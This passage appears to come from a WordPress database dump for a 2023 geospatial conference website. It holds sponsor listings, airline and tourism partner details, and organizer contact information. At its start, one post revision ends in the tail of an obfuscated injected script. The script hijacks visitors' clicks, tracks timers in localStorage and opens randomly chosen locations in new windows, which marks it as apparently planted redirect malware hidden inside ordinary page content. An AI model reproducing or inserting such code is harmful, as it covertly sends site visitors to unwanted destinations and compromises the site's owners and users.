_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:32:59','2023-08-16 00:32:59','',3066,'https://gsw2023.com/?p=5263',0,'revision','',0),
(5264,1,'2023-08-16 00:33:22','2023-08-16 00:33:22','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: 